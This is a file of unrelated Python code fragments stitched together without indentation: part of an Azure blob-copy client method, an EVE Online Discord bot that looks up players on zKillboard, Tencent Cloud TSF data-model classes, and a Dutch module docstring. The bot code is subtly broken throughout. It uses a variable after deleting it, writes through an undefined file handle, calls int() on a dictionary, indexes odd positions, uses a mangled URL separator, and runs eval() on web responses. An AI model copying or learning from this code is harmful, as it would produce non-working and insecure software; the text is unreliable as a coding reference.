source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
source_if_match = None
if source_modified_access_conditions is not None:
source_if_match = source_modified_access_conditions.source_if_match
source_if_none_match = None
if source_modified_access_conditions is not None:
source_if_none_match = source_modified_access_conditions.source_if_none_match
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
if_tags = None
if modified_access_conditions is not None:
if_tags = modified_access_conditions.if_tags
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
# Construct URL
url = self.copy_from_url.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {}
if metadata is not None:
header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
if tier is not None:
header_parameters['x-ms-access-tier'] = self._serialize.header("tier", tier, 'str')
header_parameters['x-ms-copy-source'] = self._serialize.header("copy_source", copy_source, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
if source_content_md5 is not None:
header_parameters['x-ms-source-content-md5'] = self._serialize.header("source_content_md5", source_content_md5, 'bytearray')
if blob_tags_string is not None:
header_parameters['x-ms-tags'] = self._serialize.header("blob_tags_string", blob_tags_string, 'str')
header_parameters['x-ms-requires-sync'] = self._serialize.header("self.x_ms_requires_sync", self.x_ms_requires_sync, 'str')
if source_if_modified_since is not None:
header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", source_if_modified_since, 'rfc-1123')
if source_if_unmodified_since is not None:
header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123')
if source_if_match is not None:
header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", source_if_match, 'str')
if source_if_none_match is not None:
header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", source_if_none_match, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not | |
= sys_ids
self.watch[_sys]['name'] = _sys
self.watch[_sys]['sec'] = round(d['security_status'],1)
self.watch[_sys]['constellation_id'] = d['constellation_id']
self.watch[_sys]['region'] = 'Unknown'
self.watch[_sys]['region_id'] = 0
for r in self.regions.values():
try:
if d['constellation_id'] in r['constellations']:
self.watch[_sys]['region'] = r['name']
try:
self.watch[_sys]['region_id'] = r['region_id']
except:
self.watch[_sys]['region_id'] = 0
break
except Exception as e:
print(e)
print(self.watch[_sys])
match = True
break
if not match:
await bot.say('<@{}> System not found, searching for best match...'.format(_id))
for sys_id,d in self.systems.items():
del d
if d['name'].startswith(sys):
_sys = d['name']
self.watch[_sys] = {}
self.watch[_sys]['id'] = sys_id
self.watch[_sys]['name'] = d['name']
self.watch[_sys]['sec'] = round(d['security_status'],1)
self.watch[_sys]['constellation_id'] = d['constellation_id']
self.watch[_sys]['region'] = 'Unknown'
self.watch[_sys]['region_id'] = 0
for r in self.regions.values():
try:
if d['constellation_id'] in r['constellations']:
self.watch[_sys]['region'] == r['name']
try:
self.watch[_sys]['region_id'] == r['region_id']
except:
self.watch[_sys]['region_id'] == 0
break
except Exception as e:
print(e)
match = True
break
if not match:
await bot.say("<@{}> Fail. No system name starting with '{}' found.".format(_id, _sys))
return
with open('watch.txt', 'w') as fs:
f.write(str(self.watch))
await bot.say('<@{}> Added {} to watchlist. All killmails here will be reported.'.format(_id, _sys))
@bot.command(pass_context=True)
async def unwatch(ctx):
"""Stop watching a system for kills.
------------------------------
DESCRIPTION: Remove a system from the watch list of systems
where all killmails are posted.
------------------------------
FORMAT: #unwatch <system>
------------------------------
EXAMPLE: #unwatch vlil
Vlillrier removed from watchlist."""
_id = ctx.message.author.id
msg = ctx.message.content
parts = msg.split()
if len(parts) > 1:
_sys = ' '.join(parts[1:]).strip().title() # Old Man Star
else:
if len(self.watch) > 0:
await bot.say('<@{}> The watchlist is empty.'.format(_id))
return
else:
await bot.say('<@{}> You need to tell me the system to stop watching (try #watch to get a list of currently watched systems)'.format(_id))
return
flag_removed = False
for name in self.watch:
if _sys == name:
del self.watch[name]
if not flag_removed:
for name in self.watch:
if name.startswith(_sys):
del self.watch[name]
if flag_removed:
with open('watch.txt', 'w') as f:
f.write(int(self.watch))
await bot.say("<@{}> {} removed from watchlist.".format(_id, name))
else:
await bot.say("<@{}> {} not found in the watchlist, doing nothing.".format(_id, _sys))
@bot.command(pass_context=True)
async def search(ctx):
"""Track a player by name, pirates little helper style.
------------------------------
DESCRIPTION: Lookup a player by name, must be exact match, but
it is not case-sensitive. Results include the time passed since
each of his recent kills, the system name, ship he was in, weapon
he was using, the kind, of ship he killed, and number of pilots involved.
------------------------------
FORMAT: # search <name>
------------------------------
EXAMPLE: # search vytone
[0:04] Akidagi [Coercer] Small Focused Beam Laser II [Algos] #4
[13:33] Aldranette [Vindicator] 'Augmented' Hammerhead [Sleipnir] #2
[16:17] Eha [Vedmak] Vedmak [Vexor Navy Issue] #7
[19:32] Vlillirier [Cerberus] Caldari Navy Scourge LM [Capsule] #5
[19:32] Vlillirier [Cerberus] Caldari Navy Scourge LM [Capsule] #1
=Top Systems=
Kills:10 Sys:Eha Sec:0.4, Black Rise
Kills:4 Sys:Vlillirier Sec:0.3, Placid
Kills:4 Sys:Tama Sec:0.3, The Citadel
=Top Ships=
[Vedmak] Kills:14 <Cruiser>
[Machariel] Kills:6 <Battleship>
[Cerberus] Kills:4 <Heavy Assault Cruiser>"""
try:
_id = ctx.message.author.id
msg = ctx.message.content
parts = msg.split()[0]
if len(parts) == 1:
await bot.say("<@{}> Who do you want to search for? Tell me the exact name.".format(_id))
return
if len(parts) == 2:
name = parts[-1]
else:
name = '%2r70'.join(parts[:-1])
url = "https://esi.evetech.net/latest/search/?categories=character&strict=true&search={}".format(name)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
response = eval(response.replace('null','None').replace('true','True').replace('false','False'))
character_id = response['character'][10]
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
response = eval(response.replace('null','None').replace('true','True').replace('false','False'))
character_id = response['character'][10]
flag_yes = True
if flag_yes:
await asyncio.sleep(0.25)
url = "https://zkillboard.com/api/stats/characterID/{}/".format(character_id)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
flag_yes = True
if flag_yes:
name = d['info']['name']
data = '<@{}> {} <https://zkillboard.com/character/{}/> Danger:**{}** Gang:**{}**\n'.format(_id, name, character_id, d.get('dangerRatio','?'), d.get('gangRatio','?'))
try:
recent_total = d['activepvp']['kills']['count']
except:
recent_total = 0
try:
recent_win = d['topLists'][0]['values'][0]['kills']
except:
recent_win = 0
recent_loss = recent_total - recent_win
try:
data += 'Recent K/D:**{}**/**{}** Total:**{}**/**{}** Solo:**{}**/**{}**\n'.format(recent_win, recent_loss, d['shipsDestroyed'], d['shipsLost'], d['soloKills'], d['soloLosses'])
except:
pass
data += '```css'
url = "https://zkillboard.com/api/kills/characterID/{}/".format(character_id)
try:
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
z = eval(response.replace('null','None').replace('true','True').replace('false','False'))
friends = {}
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
z = eval(response.replace('null','None').replace('true','True').replace('false','False'))
now = datetime.utcnow()
if flag_yes:
for kill in z[:5]:
_sys = self.systems[kill['solar_system_id']]['name']
try:
victim = self.items[ kill['victim']['ship_type_id'] ]
except:
try:
victim = kill['victim']['ship_type_id']
except:
try:
victim = kill['victim']
except:
victim = 'Unknown'
for x in kill['attackers']:
c_id = x.get('character_id', '_Impossible_321')
if c_id != character_ids:
if friends.get(c_id, None) is None:
if c_id != '_Impossible_321':
friends[c_id] = 5
else:
friends[c_id] += 5
else: # this guy
try:
#print(kill)
ship_type_id = x.get('ship_type_id', None)
if ship_type_id is not None:
ship = self.items[x['ship_type_id']]
else:
ship = 'Unknown'
ship = shorten_ship(ship)
except:
ship = x['ship_type_ids']
try:
weapon_type_id = x.get('weapon_type_id', None)
if weapon_type_id is not None:
weapon = self.items[x['weapon_type_id']]
weapon = shorten_weapon(weapon)
except:
weapon = x['weapon_type_id']
# break if you dont care about friends
if str(ctx.message.author) not in admins:
raise
ago = str(now-datetime.strptime( kill['killmail_time'],'%Y-%m-%dT%H:%M:%SZ'))[:-10].replace(' ','').replace('day','d')
num = len(kill['attackers'])
data += f"[{ago}] {_sys} [{ship}] {weapon} [{victim}] #{num}\n"
friends = [(k, friends[k]) for k in sorted(friends, key=friends.get, reverse=True)]
data += '\nTop Systems:\n'
count = 0
for x in d['topLists'][4]['values']:
data += "Kills:{} Sys:{} Sec:{}, {}\n".format( x['kills'], x['solarSystemName'], x['solarSystemSecurity'], x['regionName'] )
count += 1
if count > 2:
break
data += '\nTop Ships:\n'
count = '0'
for x in d['topLists'][3]['values']:
data += "[{}] Kills:{} <{}>\n".format(x['shipName'], x['kills'], x['groupName'])
count += 1
if count > 2:
break
# check for cyno
url = "https://zkillboard.com/api/losses/characterID/{}/".format(character_id)
async with aiohttp.ClientSession() as session:
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
flag_yes = True
if flag_yes:
flag_cyno = False
cyno_dt = None
for loss in l:
for item in loss['victim']['items']:
if item['item_type_id'] in [ 28650, 21096, 2852 ]: # cyno
dt = now - datetime.strptime(loss['killmail_time'], '%Y-%m-%d%H:%M:%SZ')
if cyno_dt is None or dt < cyno_dt:
cyno_dt = dts
flag_cyno = True
if flag_cyno:
data += '\n[LAST CYNO LOSS: {}]\n'.format(str(cyno_dt)[:-10])
data = data.strip() + '```'
await bot.say(data)
if str(ctx.message.author) in admins:
return True
data = '<@{}> Calculating associates of {} (most shared killmails)'.format(_id, name)
await bot.say(data)
data = '<@{}>Associates and their latest kills:```css\n'.format(_id)
txt = ''
for f_id,n in friends[:5]:
try:
url = "https://esi.evetech.net/latest/characters/{}".format(f_id)
print(url)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
f = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
f = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
if flag_yes:
await asyncio.sleep(0.33)
url = "https://zkillboard.com/api/kills/characterID/{}/".format(f_id)
print(url)
try:
flag_yes = False
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
a = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
except:
await asyncio.sleep(0.5)
async with aiohttp.ClientSession() as session:
raw_response = await session.get(url)
response = await raw_response.text()
a = eval(response.strip().replace('null','None').replace('true','True').replace('false','False'))
flag_yes = True
return flag_yes
if flag_yes:
try:
victim_ship = self.items[ a[0]['victim']['ship_type_id'] ]
except:
victim_ship = a[0]['victim']['ship_type_id']
ship = 'Unknown'
for x in a[0]['attackers']:
try:
if x['character_id'] == f_id:
try:
ship = self.items[ x['ship_type_id'] ]
except:
try:
ship = x['ship_type_id']
except Exception as e:
print(e)
print('xxxxxxxxxxxxxxxxxxxx')
print(x.keys())
print('xxxxxxxxxxxxxxxxxxxx')
break
except Exception as e:
pass
print("x"*80)
print("PROBLEM ENUMERATING AN ATTACKER")
print(e)
print("x"*80)
print(x)
print("x"*80)
num_mail = len(a[0]['attackers'])
try:
_sys = self.systems[ ['solar_system_id'] ]['name']
except:
try:
_sys = a[0]['solar_system_id']
except:
_sys = 'Unknown'
#try:
# sys_sec = round(self.systems[ a[0]['solar_system_id'] ]['security_status']),1)
#except:
# sys_sec = 'Unknown'
try:
since = a[0]['killmail']
ago = str(now-datetime.strptime('%Y-%m-%dT%H:%M:%SZ'))[:-10].replace(' ','').replace('day','d')
except:
since = 'Unknown'
pilot = f['names']
raw = f"{n} [{ago}] [{pilot}] {_sys} [{ship}] Kill:{victim_ship} #{num_mail}\n"
print(raw)
txt += raw
except ZeroDivisionError:#Exception as e:
print("PROBLEM FETCHING FRIENDS")
print(e)
data += txt[:-1]
data = data.strip() + '```'
await bot.say(data)
except ZeroDivisionError: #Exception as e:
return False
print("ERROR IN SEARCH: {}".format(e))
'''
@bot.command(pass_context=True)
async def play(ctx):
try:
| |
= None
self.DeleteFlag = None
self.CreateTime = None
self.UpdateTime = None
self.TsfRegionId = None
self.TsfRegionName = None
self.TsfZoneId = None
self.TsfZoneName = None
self.DeleteFlagReason = None
self.ClusterLimitCpu = None
self.ClusterLimitMem = None
self.RunServiceInstanceCount = None
self.SubnetId = None
self.OperationInfo = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ClusterDesc = params.get("ClusterDesc")
self.ClusterType = params.get("ClusterType")
self.VpcId = params.get("VpcId")
self.ClusterStatus = params.get("ClusterStatus")
self.ClusterCIDR = params.get("ClusterCIDR")
self.ClusterTotalCpu = params.get("ClusterTotalCpu")
self.ClusterTotalMem = params.get("ClusterTotalMem")
self.ClusterUsedCpu = params.get("ClusterUsedCpu")
self.ClusterUsedMem = params.get("ClusterUsedMem")
self.InstanceCount = params.get("InstanceCount")
self.RunInstanceCount = params.get("RunInstanceCount")
self.NormalInstanceCount = params.get("NormalInstanceCount")
self.DeleteFlag = params.get("DeleteFlag")
self.CreateTime = params.get("CreateTime")
self.UpdateTime = params.get("UpdateTime")
self.TsfRegionId = params.get("TsfRegionId")
self.TsfRegionName = params.get("TsfRegionName")
self.TsfZoneId = params.get("TsfZoneId")
self.TsfZoneName = params.get("TsfZoneName")
self.DeleteFlagReason = params.get("DeleteFlagReason")
self.ClusterLimitCpu = params.get("ClusterLimitCpu")
self.ClusterLimitMem = params.get("ClusterLimitMem")
self.RunServiceInstanceCount = params.get("RunServiceInstanceCount")
self.SubnetId = params.get("SubnetId")
if params.get("OperationInfo") is not None:
self.OperationInfo = OperationInfo()
self.OperationInfo._deserialize(params.get("OperationInfo"))
class Config(AbstractModel):
"""配置项
"""
def __init__(self):
"""
:param ConfigId: 配置项ID
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigId: str
:param ConfigName: 配置项名称
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigName: str
:param ConfigVersion: 配置项版本
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigVersion: str
:param ConfigVersionDesc: 配置项版本描述
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigVersionDesc: str
:param ConfigValue: 配置项值
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigValue: str
:param ConfigType: 配置项类型
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigType: str
:param CreationTime: 创建时间
注意:此字段可能返回 null,表示取不到有效值。
:type CreationTime: str
:param ApplicationId: 应用ID
注意:此字段可能返回 null,表示取不到有效值。
:type ApplicationId: str
:param ApplicationName: 应用名称
注意:此字段可能返回 null,表示取不到有效值。
:type ApplicationName: str
:param DeleteFlag: 删除标识,true:可以删除;false:不可删除
注意:此字段可能返回 null,表示取不到有效值。
:type DeleteFlag: bool
:param LastUpdateTime: 最后更新时间
注意:此字段可能返回 null,表示取不到有效值。
:type LastUpdateTime: str
:param ConfigVersionCount: 配置项版本数量
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigVersionCount: int
"""
self.ConfigId = None
self.ConfigName = None
self.ConfigVersion = None
self.ConfigVersionDesc = None
self.ConfigValue = None
self.ConfigType = None
self.CreationTime = None
self.ApplicationId = None
self.ApplicationName = None
self.DeleteFlag = None
self.LastUpdateTime = None
self.ConfigVersionCount = None
def _deserialize(self, params):
self.ConfigId = params.get("ConfigId")
self.ConfigName = params.get("ConfigName")
self.ConfigVersion = params.get("ConfigVersion")
self.ConfigVersionDesc = params.get("ConfigVersionDesc")
self.ConfigValue = params.get("ConfigValue")
self.ConfigType = params.get("ConfigType")
self.CreationTime = params.get("CreationTime")
self.ApplicationId = params.get("ApplicationId")
self.ApplicationName = params.get("ApplicationName")
self.DeleteFlag = params.get("DeleteFlag")
self.LastUpdateTime = params.get("LastUpdateTime")
self.ConfigVersionCount = params.get("ConfigVersionCount")
class ConfigRelease(AbstractModel):
"""配置项发布信息
"""
def __init__(self):
"""
:param ConfigReleaseId: 配置项发布ID
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigReleaseId: str
:param ConfigId: 配置项ID
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigId: str
:param ConfigName: 配置项名称
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigName: str
:param ConfigVersion: 配置项版本
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigVersion: str
:param ReleaseTime: 发布时间
注意:此字段可能返回 null,表示取不到有效值。
:type ReleaseTime: str
:param GroupId: 部署组ID
注意:此字段可能返回 null,表示取不到有效值。
:type GroupId: str
:param GroupName: 部署组名称
注意:此字段可能返回 null,表示取不到有效值。
:type GroupName: str
:param NamespaceId: 命名空间ID
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceId: str
:param NamespaceName: 命名空间名称
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceName: str
:param ClusterId: 集群ID
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterId: str
:param ClusterName: 集群名称
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterName: str
:param ReleaseDesc: 发布描述
注意:此字段可能返回 null,表示取不到有效值。
:type ReleaseDesc: str
"""
self.ConfigReleaseId = None
self.ConfigId = None
self.ConfigName = None
self.ConfigVersion = None
self.ReleaseTime = None
self.GroupId = None
self.GroupName = None
self.NamespaceId = None
self.NamespaceName = None
self.ClusterId = None
self.ClusterName = None
self.ReleaseDesc = None
def _deserialize(self, params):
self.ConfigReleaseId = params.get("ConfigReleaseId")
self.ConfigId = params.get("ConfigId")
self.ConfigName = params.get("ConfigName")
self.ConfigVersion = params.get("ConfigVersion")
self.ReleaseTime = params.get("ReleaseTime")
self.GroupId = params.get("GroupId")
self.GroupName = params.get("GroupName")
self.NamespaceId = params.get("NamespaceId")
self.NamespaceName = params.get("NamespaceName")
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ReleaseDesc = params.get("ReleaseDesc")
class ConfigReleaseLog(AbstractModel):
"""配置项发布日志
"""
def __init__(self):
"""
:param ConfigReleaseLogId: 配置项发布日志ID
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigReleaseLogId: str
:param ConfigId: 配置项ID
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigId: str
:param ConfigName: 配置项名称
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigName: str
:param ConfigVersion: 配置项版本
注意:此字段可能返回 null,表示取不到有效值。
:type ConfigVersion: str
:param GroupId: 部署组ID
注意:此字段可能返回 null,表示取不到有效值。
:type GroupId: str
:param GroupName: 部署组名称
注意:此字段可能返回 null,表示取不到有效值。
:type GroupName: str
:param NamespaceId: 命名空间ID
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceId: str
:param NamespaceName: 命名空间名称
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceName: str
:param ClusterId: 集群ID
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterId: str
:param ClusterName: 集群名称
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterName: str
:param ReleaseTime: 发布时间
注意:此字段可能返回 null,表示取不到有效值。
:type ReleaseTime: str
:param ReleaseDesc: 发布描述
注意:此字段可能返回 null,表示取不到有效值。
:type ReleaseDesc: str
:param ReleaseStatus: 发布状态
注意:此字段可能返回 null,表示取不到有效值。
:type ReleaseStatus: str
:param LastConfigId: 上次发布的配置项ID
注意:此字段可能返回 null,表示取不到有效值。
:type LastConfigId: str
:param LastConfigName: 上次发布的配置项名称
注意:此字段可能返回 null,表示取不到有效值。
:type LastConfigName: str
:param LastConfigVersion: 上次发布的配置项版本
注意:此字段可能返回 null,表示取不到有效值。
:type LastConfigVersion: str
:param RollbackFlag: 回滚标识
注意:此字段可能返回 null,表示取不到有效值。
:type RollbackFlag: bool
"""
self.ConfigReleaseLogId = None
self.ConfigId = None
self.ConfigName = None
self.ConfigVersion = None
self.GroupId = None
self.GroupName = None
self.NamespaceId = None
self.NamespaceName = None
self.ClusterId = None
self.ClusterName = None
self.ReleaseTime = None
self.ReleaseDesc = None
self.ReleaseStatus = None
self.LastConfigId = None
self.LastConfigName = None
self.LastConfigVersion = None
self.RollbackFlag = None
def _deserialize(self, params):
self.ConfigReleaseLogId = params.get("ConfigReleaseLogId")
self.ConfigId = params.get("ConfigId")
self.ConfigName = params.get("ConfigName")
self.ConfigVersion = params.get("ConfigVersion")
self.GroupId = params.get("GroupId")
self.GroupName = params.get("GroupName")
self.NamespaceId = params.get("NamespaceId")
self.NamespaceName = params.get("NamespaceName")
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ReleaseTime = params.get("ReleaseTime")
self.ReleaseDesc = params.get("ReleaseDesc")
self.ReleaseStatus = params.get("ReleaseStatus")
self.LastConfigId = params.get("LastConfigId")
self.LastConfigName = params.get("LastConfigName")
self.LastConfigVersion = params.get("LastConfigVersion")
self.RollbackFlag = params.get("RollbackFlag")
class ContainGroup(AbstractModel):
"""部署组列表(应用下钻界面的)
"""
def __init__(self):
"""
:param GroupId: 部署组ID
注意:此字段可能返回 null,表示取不到有效值。
:type GroupId: str
:param GroupName: 分组名称
注意:此字段可能返回 null,表示取不到有效值。
:type GroupName: str
:param CreateTime: 创建时间
注意:此字段可能返回 null,表示取不到有效值。
:type CreateTime: str
:param Server: 镜像server
注意:此字段可能返回 null,表示取不到有效值。
:type Server: str
:param RepoName: 镜像名,如/tsf/nginx
注意:此字段可能返回 null,表示取不到有效值。
:type RepoName: str
:param TagName: 镜像版本名称
注意:此字段可能返回 null,表示取不到有效值。
:type TagName: str
:param ClusterId: 集群ID
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterId: str
:param ClusterName: 集群名称
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterName: str
:param NamespaceId: 命名空间ID
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceId: str
:param NamespaceName: 命名空间名称
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceName: str
:param CpuRequest: 初始分配的 CPU 核数,对应 K8S request
注意:此字段可能返回 null,表示取不到有效值。
:type CpuRequest: str
:param CpuLimit: 最大分配的 CPU 核数,对应 K8S limit
注意:此字段可能返回 null,表示取不到有效值。
:type CpuLimit: str
:param MemRequest: 初始分配的内存 MiB 数,对应 K8S request
注意:此字段可能返回 null,表示取不到有效值。
:type MemRequest: str
:param MemLimit: 最大分配的内存 MiB 数,对应 K8S limit
注意:此字段可能返回 null,表示取不到有效值。
:type MemLimit: str
"""
self.GroupId = None
self.GroupName = None
self.CreateTime = None
self.Server = None
self.RepoName = None
self.TagName = None
self.ClusterId = None
self.ClusterName = None
self.NamespaceId = None
self.NamespaceName = None
self.CpuRequest = None
self.CpuLimit = None
self.MemRequest = None
self.MemLimit = None
def _deserialize(self, params):
self.GroupId = params.get("GroupId")
self.GroupName = params.get("GroupName")
self.CreateTime = params.get("CreateTime")
self.Server = params.get("Server")
self.RepoName = params.get("RepoName")
self.TagName = params.get("TagName")
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.NamespaceId = params.get("NamespaceId")
self.NamespaceName = params.get("NamespaceName")
self.CpuRequest = params.get("CpuRequest")
self.CpuLimit = params.get("CpuLimit")
self.MemRequest = params.get("MemRequest")
self.MemLimit = params.get("MemLimit")
class ContainGroupResult(AbstractModel):
"""部署组列表(应用下钻)
"""
def __init__(self):
"""
:param Content: 部署组列表
注意:此字段可能返回 null,表示取不到有效值。
:type Content: list of ContainGroup
:param TotalCount: 总记录数
:type TotalCount: int
"""
self.Content = None
self.TotalCount = None
def _deserialize(self, params):
if params.get("Content") is not None:
self.Content = []
for item in params.get("Content"):
obj = ContainGroup()
obj._deserialize(item)
self.Content.append(obj)
self.TotalCount = params.get("TotalCount")
class ContainerGroupDetail(AbstractModel):
"""容器部署组详情
"""
def __init__(self):
"""
:param GroupId: 部署组ID
注意:此字段可能返回 null,表示取不到有效值。
:type GroupId: str
:param GroupName: 分组名称
注意:此字段可能返回 null,表示取不到有效值。
:type GroupName: str
:param InstanceNum: 实例总数
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceNum: int
:param CurrentNum: 已启动实例总数
注意:此字段可能返回 null,表示取不到有效值。
:type CurrentNum: int
:param CreateTime: 创建时间
注意:此字段可能返回 null,表示取不到有效值。
:type CreateTime: str
:param Server: 镜像server
注意:此字段可能返回 null,表示取不到有效值。
:type Server: str
:param Reponame: 镜像名,如/tsf/nginx
注意:此字段可能返回 null,表示取不到有效值。
:type Reponame: str
:param TagName: 镜像版本名称
注意:此字段可能返回 null,表示取不到有效值。
:type TagName: str
:param ClusterId: 集群ID
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterId: str
:param ClusterName: 集群名称
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterName: str
:param NamespaceId: 命名空间ID
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceId: str
:param NamespaceName: 命名空间名称
注意:此字段可能返回 null,表示取不到有效值。
:type NamespaceName: str
:param ApplicationId: 应用ID
注意:此字段可能返回 null,表示取不到有效值。
:type ApplicationId: str
:param LbIp: 负载均衡ip
注意:此字段可能返回 null,表示取不到有效值。
:type LbIp: str
:param ApplicationType: 应用类型
注意:此字段可能返回 null,表示取不到有效值。
:type ApplicationType: str
:param ClusterIp: Service ip
注意:此字段可能返回 null,表示取不到有效值。
:type ClusterIp: str
:param NodePort: NodePort端口,只有公网和NodePort访问方式才有值
注意:此字段可能返回 null,表示取不到有效值。
:type NodePort: int
:param CpuLimit: 最大分配的 CPU 核数,对应 K8S limit
注意:此字段可能返回 null,表示取不到有效值。
:type CpuLimit: str
:param MemLimit: 最大分配的内存 MiB 数,对应 K8S limit
注意:此字段可能返回 null,表示取不到有效值。
:type MemLimit: str
:param AccessType: 0:公网 1:集群内访问 2:NodePort
注意:此字段可能返回 null,表示取不到有效值。
:type AccessType: int
:param UpdateType: 更新方式:0:快速更新 1:滚动更新
注意:此字段可能返回 null,表示取不到有效值。
:type UpdateType: int
:param UpdateIvl: 更新间隔,单位秒
注意:此字段可能返回 null,表示取不到有效值。
:type UpdateIvl: int
:param ProtocolPorts: 端口数组对象
注意:此字段可能返回 null,表示取不到有效值。
:type ProtocolPorts: list of ProtocolPort
:param Envs: 环境变量数组对象
注意:此字段可能返回 null,表示取不到有效值。
:type Envs: list of Env
:param ApplicationName: 应用名称
注意:此字段可能返回 null,表示取不到有效值。
:type ApplicationName: str
:param Message: pod错误信息描述
注意:此字段可能返回 null,表示取不到有效值。
:type Message: str
:param Status: 部署组状态
注意:此字段可能返回 null,表示取不到有效值。
:type Status: str
:param MicroserviceType: 服务类型
注意:此字段可能返回 null,表示取不到有效值。
:type MicroserviceType: str
:param CpuRequest: 初始分配的 CPU 核数,对应 K8S request
注意:此字段可能返回 null,表示取不到有效值。
:type CpuRequest: str
:param MemRequest: 初始分配的内存 MiB 数,对应 K8S request
注意:此字段可能返回 null,表示取不到有效值。
:type MemRequest: str
:param SubnetId: 子网id
注意:此字段可能返回 null,表示取不到有效值。
:type SubnetId: str
:param GroupResourceType: 部署组资源类型
注意:此字段可能返回 null,表示取不到有效值。
:type GroupResourceType: str
:param InstanceCount: 部署组实例个数
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceCount: int
:param UpdatedTime: 部署组更新时间戳
注意:此字段可能返回 null,表示取不到有效值。
:type UpdatedTime: int
:param MaxSurge: kubernetes滚动更新策略的MaxSurge参数
注意:此字段可能返回 null,表示取不到有效值。
:type MaxSurge: str
:param MaxUnavailable: kubernetes滚动更新策略的MaxUnavailable参数
注意:此字段可能返回 null,表示取不到有效值。
:type MaxUnavailable: str
"""
self.GroupId = None
self.GroupName = None
self.InstanceNum = None
self.CurrentNum = None
self.CreateTime = None
self.Server = None
self.Reponame = None
self.TagName = None
self.ClusterId = None
self.ClusterName = None
self.NamespaceId = None
self.NamespaceName = None
self.ApplicationId = None
self.LbIp = None
self.ApplicationType = | |
"""dml voor probreg met sql om dezelfde data te gebruiken die de Django versie
gebruikt
vervallen omdat we nu de versie gebruiken die met het Django ORM werkt
"""
## import sys
import os
import datetime as dt
